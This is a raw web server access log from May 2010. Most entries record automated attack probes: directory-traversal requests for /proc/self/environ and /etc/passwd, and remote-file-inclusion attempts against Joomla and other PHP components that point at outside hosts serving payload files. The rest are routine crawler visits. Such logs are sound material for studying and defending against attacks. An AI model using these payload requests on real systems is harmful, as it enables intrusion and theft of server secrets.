58.125.181.214 - - [25/May/2010:02:05:16 -0500] "GET /logs/index.php?option=com_bsq_sitestats&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
58.125.181.214 - - [25/May/2010:02:05:17 -0500] "GET /index.php?option=com_bsq_sitestats&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
64.62.251.26 - - [25/May/2010:02:07:30 -0500] "GET /logs/access_log.1271203200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
207.46.13.99 - - [25/May/2010:02:07:31 -0500] "GET /costume/cd-page1.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.62.251.26 - - [25/May/2010:02:07:32 -0500] "GET /logs/access_log.1271030400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
109.72.86.6 - - [25/May/2010:02:08:10 -0500] "GET /logs/access_log.1272585600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.bdkorea.org/zeroboard/data/bangla01/zd1.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
183.89.192.244 - - [25/May/2010:02:08:19 -0500] "GET /logs/index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)"
183.89.192.244 - - [25/May/2010:02:08:20 -0500] "GET /index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)"
183.89.192.244 - - [25/May/2010:02:08:21 -0500] "GET /index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)"
183.89.192.244 - - [25/May/2010:02:08:32 -0500] "GET /logs/index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)"
183.89.192.244 - - [25/May/2010:02:08:33 -0500] "GET /index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)"
183.89.192.244 - - [25/May/2010:02:08:42 -0500] "GET /index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)"
67.195.112.180 - - [25/May/2010:02:08:54 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [25/May/2010:02:08:54 -0500] "GET /logs/access_log.1217030400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
75.136.121.230 - - [25/May/2010:02:09:25 -0500] "GET /logs/access_log.1273363200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
64.62.251.26 - - [25/May/2010:02:09:43 -0500] "GET /logs/access_log.1273363200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
121.78.118.123 - - [25/May/2010:02:14:21 -0500] "GET /logs/access_log.1273622400/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
121.78.118.123 - - [25/May/2010:02:14:21 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [25/May/2010:02:14:22 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.114.179.213 - - [25/May/2010:02:16:05 -0500] "GET / HTTP/1.1" 200 1003 "-""Java/1.6.0_17"
87.250.255.243 - - [25/May/2010:02:17:20 -0500] "GET /logs/access_log.1249862400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
209.126.254.139 - - [25/May/2010:02:18:49 -0500] "GET /?sourcedir=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
209.126.254.139 - - [25/May/2010:02:18:49 -0500] "GET /logs/access_log.1271548800/?sourcedir=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 311 "-""Mozilla/5.0"
209.126.254.139 - - [25/May/2010:02:18:49 -0500] "GET /logs/?sourcedir=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 200 6908 "-""Mozilla/5.0"
121.78.118.123 - - [25/May/2010:02:18:56 -0500] "GET /logs/access_log.1274313600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
121.78.118.123 - - [25/May/2010:02:18:56 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [25/May/2010:02:18:57 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
92.48.207.112 - - [25/May/2010:02:24:05 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
92.48.207.112 - - [25/May/2010:02:24:30 -0500] "GET /logs/access_log.1270771200//components/com_flyspray/startdown.php?file=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
92.48.207.112 - - [25/May/2010:02:25:01 -0500] "GET /logs/access_log.1265155200//components/com_flyspray/startdown.php?file=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
65.55.2.140 - - [25/May/2010:02:25:37 -0500] "GET /artwork/furniture.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
92.48.207.112 - - [25/May/2010:02:29:14 -0500] "GET //components/com_flyspray/startdown.php?file=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
92.48.207.112 - - [25/May/2010:02:29:15 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
92.48.207.112 - - [25/May/2010:02:29:17 -0500] "GET /logs/access_log.1270771200//components/com_flyspray/startdown.php?file=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
92.48.207.112 - - [25/May/2010:02:29:46 -0500] "GET /logs/access_log.1265155200//components/com_flyspray/startdown.php?file=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
77.92.74.100 - - [25/May/2010:02:32:13 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
77.92.74.100 - - [25/May/2010:02:32:13 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
204.152.200.50 - - [25/May/2010:02:32:30 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
204.152.200.50 - - [25/May/2010:02:32:31 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
67.205.76.135 - - [25/May/2010:02:32:37 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.205.76.135 - - [25/May/2010:02:32:38 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
88.191.94.188 - - [25/May/2010:02:34:39 -0500] "GET //include/write.php?dir=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
88.191.94.188 - - [25/May/2010:02:34:39 -0500] "GET /logs/access_log.1271980800//include/write.php?dir=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
88.191.94.188 - - [25/May/2010:02:34:39 -0500] "GET /logs//include/write.php?dir=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 307 "-""Mozilla/5.0"
81.169.175.150 - - [25/May/2010:02:38:59 -0500] "GET /?pagina=./../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1003 "-""-"
81.169.175.150 - - [25/May/2010:02:39:00 -0500] "GET /?pagina=./../../../../../../../../etc/passwd HTTP/1.1" 200 1003 "-""-"
174.121.59.218 - - [25/May/2010:02:41:16 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.210.123.70 - - [25/May/2010:02:41:31 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.819"
69.175.61.122 - - [25/May/2010:02:41:33 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
74.54.63.138 - - [25/May/2010:02:42:02 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.227.143.132 - - [25/May/2010:02:42:07 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
200.234.200.72 - - [25/May/2010:02:44:00 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
200.234.200.72 - - [25/May/2010:02:44:00 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.108.70.32 - - [25/May/2010:02:44:33 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
195.159.29.178 - - [25/May/2010:02:45:26 -0500] "GET //////appserv/main.php?appserv_root=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
195.159.29.178 - - [25/May/2010:02:45:26 -0500] "GET /logs/access_log.1266537600//////appserv/main.php?appserv_root=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
195.159.29.178 - - [25/May/2010:02:45:26 -0500] "GET /logs//////appserv/main.php?appserv_root=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
195.159.29.178 - - [25/May/2010:02:46:43 -0500] "GET /logs/access_log.1266019200//////appserv/main.php?appserv_root=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
87.250.255.243 - - [25/May/2010:02:46:53 -0500] "GET /tattoo/set2.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
78.110.50.119 - - [25/May/2010:02:47:01 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
78.110.50.119 - - [25/May/2010:02:47:01 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
78.110.50.119 - - [25/May/2010:02:47:01 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
78.110.50.119 - - [25/May/2010:02:47:02 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
77.222.56.62 - - [25/May/2010:02:48:26 -0500] "GET //upload.php?file=http://pkill.interfree.it/id.jpg? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
77.222.56.62 - - [25/May/2010:02:48:26 -0500] "GET /logs//upload.php?file=http://pkill.interfree.it/id.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
207.46.13.99 - - [25/May/2010:02:49:00 -0500] "GET /logs/access_log.1177632000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.194.77 - - [25/May/2010:02:49:21 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.77 - - [25/May/2010:02:49:21 -0500] "GET /artwork/tinvisible1.jpg HTTP/1.1" 200 5429 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
69.94.137.93 - - [25/May/2010:02:51:38 -0500] "GET /logs/inc/cmses/aedating4CMS.php?dir[inc]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 315 "-""libwww-perl/5.805"
69.94.137.93 - - [25/May/2010:02:51:38 -0500] "GET /inc/cmses/aedating4CMS.php?dir[inc]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 310 "-""libwww-perl/5.805"
69.94.137.93 - - [25/May/2010:02:51:42 -0500] "GET /logs/inc/cmses/aedating4CMS.php?dir[inc]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 315 "-""libwww-perl/5.805"
69.94.137.93 - - [25/May/2010:02:51:42 -0500] "GET /inc/cmses/aedating4CMS.php?dir[inc]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 310 "-""libwww-perl/5.805"
69.94.137.93 - - [25/May/2010:02:52:10 -0500] "GET /logs//administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 362 "-""libwww-perl/5.805"
69.94.137.93 - - [25/May/2010:02:52:10 -0500] "GET //administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 357 "-""libwww-perl/5.805"
69.94.137.93 - - [25/May/2010:02:52:13 -0500] "GET /logs//administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 362 "-""libwww-perl/5.805"
69.94.137.93 - - [25/May/2010:02:52:14 -0500] "GET //administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 357 "-""libwww-perl/5.805"
69.175.61.122 - - [25/May/2010:02:52:44 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.833"
69.175.61.122 - - [25/May/2010:02:52:44 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
69.175.61.122 - - [25/May/2010:02:52:44 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
74.54.63.138 - - [25/May/2010:02:54:03 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.54.63.138 - - [25/May/2010:02:54:03 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [25/May/2010:02:54:03 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
67.210.123.70 - - [25/May/2010:02:54:56 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.819"
67.210.123.70 - - [25/May/2010:02:54:56 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.819"
67.210.123.70 - - [25/May/2010:02:54:56 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.819"
77.222.56.62 - - [25/May/2010:02:55:29 -0500] "GET //upgrade_album.php?GALLERY_BASEDIR=http://pkill.interfree.it/id.jpg?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
77.222.56.62 - - [25/May/2010:02:55:29 -0500] "GET /logs//upgrade_album.php?GALLERY_BASEDIR=http://pkill.interfree.it/id.jpg?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
174.121.59.218 - - [25/May/2010:02:55:37 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
174.121.59.218 - - [25/May/2010:02:55:37 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
174.121.59.218 - - [25/May/2010:02:55:37 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
211.239.161.143 - - [25/May/2010:02:56:05 -0500] "GET //search.php?cutepath=http://pkill.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
211.239.161.143 - - [25/May/2010:02:56:05 -0500] "GET /logs//search.php?cutepath=http://pkill.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
200.234.200.72 - - [25/May/2010:02:58:32 -0500] "GET /logs/access_log.1273017600//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
200.234.200.72 - - [25/May/2010:02:58:33 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
200.234.200.72 - - [25/May/2010:02:58:33 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.108.70.32 - - [25/May/2010:02:58:46 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
89.108.70.32 - - [25/May/2010:02:58:46 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
89.108.70.32 - - [25/May/2010:02:58:46 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
67.227.143.132 - - [25/May/2010:02:58:49 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
67.227.143.132 - - [25/May/2010:02:58:49 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.227.143.132 - - [25/May/2010:02:58:49 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
207.46.195.240 - - [25/May/2010:03:01:31 -0500] "GET /logs/access_log.1184976000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.121.145.89 - - [25/May/2010:03:04:34 -0500] "GET /logs/*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.803"
91.121.145.89 - - [25/May/2010:03:04:35 -0500] "GET /*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.803"
87.250.255.243 - - [25/May/2010:03:04:41 -0500] "GET /logs/access_log.1189987200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
188.165.68.4 - - [25/May/2010:03:05:07 -0500] "GET /logs/*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.805"
188.165.68.4 - - [25/May/2010:03:05:07 -0500] "GET /*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.805"
188.165.68.4 - - [25/May/2010:03:05:58 -0500] "GET /logs/*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.805"
188.165.68.4 - - [25/May/2010:03:05:58 -0500] "GET /*?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.805"
77.92.74.100 - - [25/May/2010:03:10:07 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6908 "-""libwww-perl/5.831"
77.92.74.100 - - [25/May/2010:03:10:08 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
173.203.115.77 - - [25/May/2010:03:10:32 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.203.115.77 - - [25/May/2010:03:10:32 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.203.115.77 - - [25/May/2010:03:10:37 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.203.115.77 - - [25/May/2010:03:10:37 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
87.117.220.133 - - [25/May/2010:03:18:31 -0500] "GET /logs//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.820"
